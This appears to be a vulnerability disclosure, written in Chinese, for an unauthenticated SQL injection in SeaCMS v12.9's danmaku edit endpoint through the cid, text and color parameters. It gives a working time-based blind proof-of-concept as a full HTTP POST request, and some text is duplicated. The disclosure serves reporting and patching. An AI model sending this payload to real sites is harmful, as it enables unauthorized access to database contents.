Open pysnow1 opened 3 months ago
SeaCMS v12.9 存在未授权SQL注入漏洞,该漏洞源于/js/player/dmplayer/dmku/index.php?ac=edit处能够通过cid参数进行sql注入,从而导致数据库敏感信息泄露
js/player/dmplayer/dmku/index.php处存在SQL注入,传入ac=edit能够调用$d->编辑弹幕($cid) 而在编辑_弹幕方法处没有进行过滤导致cid、text、color都能够引起sql注入
$d->编辑弹幕($cid)
编辑_弹幕
延时3秒 延时6秒
POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 56 cid=(select(1)from(select(sleep(6)))x)&text=1&color=1
此漏洞允许未经身份验证的远程攻击者通过cid或text、color参数注入任意 SQL 命令,获取数据库敏感信息
cid
总结
SeaCMS v12.9 存在未授权SQL注入漏洞,该漏洞源于/js/player/dmplayer/dmku/index.php?ac=edit处能够通过cid参数进行sql注入,从而导致数据库敏感信息泄露
漏洞介绍
js/player/dmplayer/dmku/index.php处存在SQL注入,传入ac=edit能够调用
$d->编辑弹幕($cid)
而在编辑_弹幕
方法处没有进行过滤导致cid、text、color都能够引起sql注入漏洞验证
延时3秒 延时6秒
POC
影响
此漏洞允许未经身份验证的远程攻击者通过
cid
或text、color参数注入任意 SQL 命令,获取数据库敏感信息